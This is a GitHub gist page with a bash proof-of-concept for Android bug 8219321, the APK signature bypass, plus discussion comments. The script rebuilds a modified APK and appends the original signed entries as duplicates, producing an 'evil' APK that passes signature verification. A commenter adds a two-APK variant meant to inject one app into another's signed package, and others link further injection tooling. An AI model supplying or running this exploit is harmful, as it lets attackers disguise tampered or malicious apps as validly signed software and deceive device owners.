-
-
Save poliva/36b0795ab79ad6f14fd8 to your computer and use it in GitHub Desktop.
| #!/bin/bash | |
| # PoC for Android bug 8219321 by @pof | |
| # +info: https://jira.cyanogenmod.org/browse/CYAN-1602 | |
| if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi | |
| APK=$1 | |
| rm -r out out.apk tmp 2>/dev/null | |
| java -jar apktool.jar d $APK out | |
| #apktool d $APK out | |
| echo "Modify files, when done type 'exit'" | |
| cd out | |
| bash | |
| cd .. | |
| java -jar apktool.jar b out out.apk | |
| #apktool b out out.apk | |
| mkdir tmp | |
| cd tmp/ | |
| unzip ../$APK | |
| mv ../out.apk . | |
| cat >poc.py <<-EOF | |
| #!/usr/bin/python | |
| import zipfile | |
| import sys | |
| z = zipfile.ZipFile(sys.argv[1], "a") | |
| z.write(sys.argv[2]) | |
| z.close() | |
| EOF | |
| chmod 755 poc.py | |
| for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done | |
| cp out.apk ../evil-$APK | |
| cd .. | |
| rm -rf tmp out | |
| echo "Modified APK: evil-$APK" |
The apktools option are here: https://code.google.com/p/android-apktool/source/browse/brut.apktool/apktool-cli/src/main/java/brut/apktool/Main.java
- d: decompile
- b: build
So you simply decompile, modify and rebuild and ... Android does not recompute the hash ??
@BrunoVernay I'm duplicating entries inside the apk (original entries + rebuilt entries). The hashes in META-INF folder are from the original signed files, which are checked for signature, but the ones that end up being installed on the device are the duplicated ones.
Have you checked to see exactly which modified/duplicate files are getting installed & actually used? For example, try explicitly changing the AndroidManifest.xml.
Hi all, I modified the script so that it tackes two different files as parameters. This scenario is more realistic if we really want to leverage an attack with this technique. However, in doing so I was not able to install the repackaged application because of the "Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]" error raised by ADB. But why this works when the two applications are the same (I verified that it does not raise any error) ? One explaination would be that in order to verify that the application is well signed, the package manager computes a hash of every file in the APK and then verifies that the hash of this list of hash is well signed. This is possible that the implementation manages the case where duplicated files are in the package. Thus two same hashes would be in the list only once and thus create a valid signature. I don't know how it is implemented but I would have done so. But to conclude, according to my experiments, this flaw can not be leveraged by attackers to sign malicious applications with certificates of benign applications. My Cyanogen version is 7.2.0 for WildfireS (not official).
NB: please let me know if I have made a mistake
Hereafter the code modified:
!/bin/bash
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
mkdir tmp
cd tmp/
APK=../$2
unzip $APK
mv ../out.apk .
cat >poc.py <<-EOF
!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in find . -type f |egrep -v "(poc.py|out.apk)" ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-app.apk
cd ..
rm -rf tmp out
echo "Modified APK: evil-app"
Found a open source scanner to detect this in Google code,
@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!
here's an example that can inject contents of an APK into another:
https://github.com/poliva/random-scripts/blob/master/android/masterkey-apk-inject.sh
@poliva Thanks! :)
I tried with script. And also, ive tried adding duplicate classes.dex alone in the APK and trying to install on device, but unable to install.
Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old android, versions. Any idea on what am i missing?
@esotericnomen have you solved the problem ?
I have also met this problem.Is there any solutions?
https://github.com/Fuzion24/AndroidMasterKeys/ I built a slightly more resilient tool. This also makes sure not to duplicate files that exist in the original application as well as compress the added files. Pythons zip append in the above script will only add files as STORED (no compression).